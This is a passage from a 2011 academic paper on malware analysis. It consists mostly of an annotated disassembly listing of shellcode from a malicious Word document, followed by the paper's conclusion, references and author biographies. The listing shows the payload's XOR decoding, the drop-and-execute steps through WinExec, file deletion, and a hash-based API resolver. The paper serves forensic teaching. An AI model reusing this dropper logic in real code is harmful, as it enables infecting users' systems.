seg000:00000CE7 mov ebx, [edi+SCRATCH.pMallocdBuff0]

seg000:00000CEA

seg000:00000CEA ; This section of code loops through all bytes in

the buffer filled by the

seg000:00000CEA ; previous ReadFile() functions and xor's them

with 0x81. In the instructions,

seg000:00000CEA ; ebx is the array index and eax is the counter.

This xor-encoding

S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012

ISSN: 2230-7818 @ 2011 http://www.ijaest.iserp.org. All rights Reserved. Page 9

IJAEST

Page 10: Malware Analysis Using Assembly Level Program

seg000:00000CEA ; scheme obfuscates the code and could help

evade IDS detection in

seg000:00000CEA ; some cases.

seg000:00000CEA

seg000:00000CEA loc_CEA: ; CODE XREF:

sub_B45+1ADj

seg000:00000CEA xor byte ptr [ebx], 81h ; The output file is

static xor'd with 0x81

seg000:00000CED inc ebx

seg000:00000CEE dec eax

seg000:00000CEF cmp eax, 0

seg000:00000CF2 jnz short loc_CEA

seg000:00000CF4

seg000:00000CF4 ; At this point, the decoded payload exists on

the heap. What to do with it?

seg000:00000CF4 ; Write it to disk of course! And use the last

remaining unicode string as its

seg000:00000CF4 ; file name.

seg000:00000CF4

seg000:00000CF4 push 0

seg000:00000CF6 push 80h

seg000:00000CFB push 2

seg000:00000CFD push 0

seg000:00000CFF push 0

seg000:00000D01 push 40000000h

seg000:00000D06 push [edi+SCRATCH.String2] ; c:\~.exe

seg000:00000D09 call [edi+SCRATCH.pCreateFileW]

seg000:00000D0C mov [edi+SCRATCH.hFileTwo], eax

seg000:00000D0F push 0

seg000:00000D11 lea ebx, [edi+SCRATCH.endMarker]

seg000:00000D17 push ebx

seg000:00000D18 push [edi+SCRATCH.field_4]

seg000:00000D1B push [edi+SCRATCH.pMallocdBuff0]

seg000:00000D1E push eax

seg000:00000D1F call [edi+SCRATCH.pWriteFile]

seg000:00000D22 push 0

seg000:00000D24 lea ebx, [edi+SCRATCH.endMarker]

seg000:00000D2A push ebx

seg000:00000D2B push 0FFh

seg000:00000D30 push [edi+SCRATCH.szDOCFILENAME]

seg000:00000D33 push [edi+SCRATCH.hFileTwo]

seg000:00000D36 call [edi+SCRATCH.pWriteFile]

seg000:00000D39 push [edi+SCRATCH.hFileTwo]

seg000:00000D3C

seg000:00000D3C ; The code is cleaning up by closing its open

file handles and releasing

seg000:00000D3C ; the heap back to the OS.

seg000:00000D3C

seg000:00000D3C call [edi+SCRATCH.pCloseHandle]

seg000:00000D3F push [edi+SCRATCH.pMallocdBuff0]

seg000:00000D42 call [edi+SCRATCH.pGlobalFree]

seg000:00000D45

seg000:00000D45 ; Here the code calls WinExec() to launch the

new executable it has just

seg000:00000D45 ; written to disk. Then it deletes the copy of the

original Word doc that

seg000:00000D45 ; it saved to c:\~$ and exits.

seg000:00000D45

seg000:00000D45 push 0

seg000:00000D47 push [edi+SCRATCH.String3] ; c:\~.exe

seg000:00000D4D call [edi+SCRATCH.pWinExec]

seg000:00000D50 push [edi+SCRATCH.String1] ; c:\~$

seg000:00000D53 call [edi+SCRATCH.pDeleteFileW]

seg000:00000D56 push 0

seg000:00000D58 call [edi+SCRATCH.pExitProcess]

seg000:00000D58 sub_B45 endp

seg000:00000D58

seg000:00000D5B

seg000:00000D5B ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E

¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦

seg000:00000D5B

seg000:00000D5B ; Attributes: bp-based frame

seg000:00000D5B

seg000:00000D5B resolve_func proc near ; CODE XREF:

sub_B45+6Ap

seg000:00000D5B ; sub_B45+7Ap ...

seg000:00000D5B

seg000:00000D5B arg_0 = dword ptr 8

seg000:00000D5B arg_4 = dword ptr 0Ch

seg000:00000D5B

seg000:00000D5B push ebp ; standard function prologue

seg000:00000D5C mov ebp, esp ; standard function

prologue

seg000:00000D5E push edi ; save the scratch pad again

seg000:00000D5F mov edi, [ebp+arg_0] ; move arg[0] into edi

seg000:00000D62 mov ebx, [ebp+arg_4] ; move arg[1] into

ebx

seg000:00000D65 push esi

seg000:00000D66 mov esi, [ebx+3Ch]

seg000:00000D69 mov esi, [esi+ebx+78h]

seg000:00000D6D add esi, ebx

seg000:00000D6F push esi

seg000:00000D70 mov esi, [esi+20h]

seg000:00000D73 add esi, ebx

S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012

ISSN: 2230-7818 @ 2011 http://www.ijaest.iserp.org. All rights Reserved. Page 10

IJAEST

Page 11: Malware Analysis Using Assembly Level Program

seg000:00000D75 xor ecx, ecx

seg000:00000D77 dec ecx

seg000:00000D78

seg000:00000D78 loc_D78: ; CODE XREF:

resolve_func+36j

seg000:00000D78 inc ecx

seg000:00000D79 lodsd

seg000:00000D7A add eax, ebx

seg000:00000D7C push esi

seg000:00000D7D xor esi, esi

seg000:00000D7F

seg000:00000D7F loc_D7F: ; CODE XREF:

resolve_func+31j

seg000:00000D7F movsx edx, byte ptr [eax]

seg000:00000D82 cmp dh, dl

seg000:00000D84 jz short loc_D8E

seg000:00000D86 ror esi, 0Dh ; rotate right function

seg000:00000D89 add esi, edx

seg000:00000D8B inc eax

seg000:00000D8C jmp short loc_D7F

seg000:00000D8E ; -------------------------------------------------------------------

--------

seg000:00000D8E

seg000:00000D8E loc_D8E: ; CODE XREF:

resolve_func+29j

seg000:00000D8E cmp edi, esi

seg000:00000D90 pop esi

seg000:00000D91 jnz short loc_D78

seg000:00000D93 pop edx

seg000:00000D94 mov ebp, ebx

seg000:00000D96 mov ebx, [edx+24h]

seg000:00000D99 add ebx, ebp

seg000:00000D9B mov cx, [ebx+ecx*2]

seg000:00000D9F mov ebx, [edx+1Ch]

seg000:00000DA2 add ebx, ebp

seg000:00000DA4 mov eax, [ebx+ecx*4]

seg000:00000DA7 add eax, ebp

seg000:00000DA9 pop esi

seg000:00000DAA pop edi

seg000:00000DAB pop ebp

seg000:00000DAC retn 8

seg000:00000DAC resolve_func endp

seg000:00000DAC

seg000:00000DAF ; -------------------------------------------------------------------

--------

seg000:00000DAF

seg000:00000DAF loc_DAF: ; CODE XREF:

seg000:00000B40j

seg000:00000DAF call sub_B45

seg000:00000DAF ; -------------------------------------------------------------------

--------

seg000:00000DB4 dd 0A2000h

seg000:00000DB8 aC:

seg000:00000DB8 unicode 0, <c:\~$>,0

seg000:00000DC4 aC_exe:

seg000:00000DC4 unicode 0, <c:\~.exe>,0

seg000:00000DD6 aC_exe_0 db 'c:\~.exe',0

seg000:00000DDF db 0Eh

seg000:00000DE0 db 0

seg000:00000DE1 db 0FFh

seg000:00000DE2 db 0FFh

seg000:00000DE3 db 0FFh

seg000:00000DE4 endp

7. CONCLUSION

Malware analysis is becoming an important field of

specialization for forensic analysts. Authors of malware are

becoming increasingly profit driven and are incorporating

techniques to make their code as stealthy and undetectable as

possible. Malware is being written by professional

programmers who are very knowledgeable in their craft.

They have a very good understanding of digital forensic

methods and endeavor to make forensic analysis as difficult

as possible.

The knowledge domain required to competently

analyze malware is very broad. This paper has presented a

brief introduction to a Malware Analysis Body of Knowledge

that would be suitable for establishing a framework for

competency development and assessment for the field of

malware analysis and for incorporation into academic

curricula. A learning taxonomy is central to the malware

analysis process and eight domain areas were identified.

These areas include malware, programming, anti-forensics,

malware analysis, tools, legal and ethical considerations,

environment and collection.

S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012

ISSN: 2230-7818 @ 2011 http://www.ijaest.iserp.org. All rights Reserved. Page 11

IJAEST

Page 12: Malware Analysis Using Assembly Level Program

REFERENCES

[1].The Malware Analysis Body of Knowledge - Craig Valli

and Murray Brand.

[2].Reverse Engineering Malware - Lenny Zeltser .

[3].Malware analysis : An Introduction - Dennis Distler

[4].Introduction to Malware Analysis - Lenny Zeltser

[5].Practical Malware Analysis – Kris Kendall

Author Biography:

Mr S.MURUGAN is Working as ACTS Team Coordinator , CDAC ,Bangalore.He received BSc in Physics from Madurai Kamaraj University ,Madurai, in 1989 and MCA degree in Computer Applications from Alagappa University,Karaikudi,Tamilnadu ,India and MPhil(CS) from Manonmaniam Sundaranar University,Tirunelveli,Tamilnadu,India . He has 17 years of teaching and admin experience at PG level in the field of Computer Science. He has published 6 papers in the National conferences and 2 in International conference. His research interests include: Intelligence Network Security Algorithms, Malware prevention and Detection mechanism and algorithm. He has published 8 books and courseware in the field of Computer Science.

Dr.K.Kuppusamy is working as an Associate Professor, Department of Computer Science and Engineering, Alagappa University, Karaikukdi, Tamilnadu, India. He received his Ph.D in Computer Science and Engineering from Alagappa University, Karaikudi, Tamilnadu in the year 2007. He has published many papers in International & National Journals and presented in National and International conferences. His area of research interest include Information/Network Security, Algorithms, Neural Networks, Fault Tolerant Computing, Software Engineering & Testing and Operational Research.

S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012

ISSN: 2230-7818 @ 2011 http://www.ijaest.iserp.org. All rights Reserved. Page 12

IJAEST